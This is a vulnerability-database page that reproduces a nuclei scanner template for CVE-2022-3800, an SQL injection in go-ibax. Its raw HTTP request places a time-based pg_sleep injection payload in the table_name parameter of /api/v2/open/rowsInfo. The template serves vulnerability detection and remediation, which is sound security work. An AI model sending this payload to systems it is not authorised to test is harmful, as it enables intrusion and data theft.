Lucene search
K

IBAX - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

IBAX - SQL Injection, remote attack leads to unauthorized access, data leakage, and potential system compromise

Related
Refs
Code
id: CVE-2022-3800

info:
  name: IBAX - SQL Injection
  author: JC175
  severity: high
  description: |
    IBAX go-ibax functionality is susceptible to SQL injection via the file /api/v2/open/rowsInfo. The manipulation of the argument table_name leads to SQL injection, and the attack may be launched remotely. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
  remediation: |
    To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. Implement parameterized queries or use an ORM framework to prevent SQL injection attacks.
  reference:
    - https://github.com/IBAX-io/go-ibax/issues/2061
    - https://vuldb.com/?id.212636
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3800
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-3800
    cwe-id: CWE-707,CWE-89
    epss-score: 0.02241
    epss-percentile: 0.80711
    cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ibax
    product: go-ibax
  tags: time-based-sqli,cve2022,cve,ibax,go-ibax,sqli,vuln

http:
  - raw:
      - |
        @timeout: 15s
        POST /api/v2/open/rowsInfo HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        order=1&table_name=pg_user"%3b+select+pg_sleep(6)%3b+--"&limit=1&page=1

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "usesysid")'
        condition: and
# digest: 4a0a00473045022100a34121699a2ed143231c81aace0f660674c2402b2046a2554d6109e88278a9190220089ead017f974a5eb339205c89e598c9e8116be6e234672446ae4cf2a2f3c8a9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.16.3 - 8.8
EPSS0.02241
SSVC
29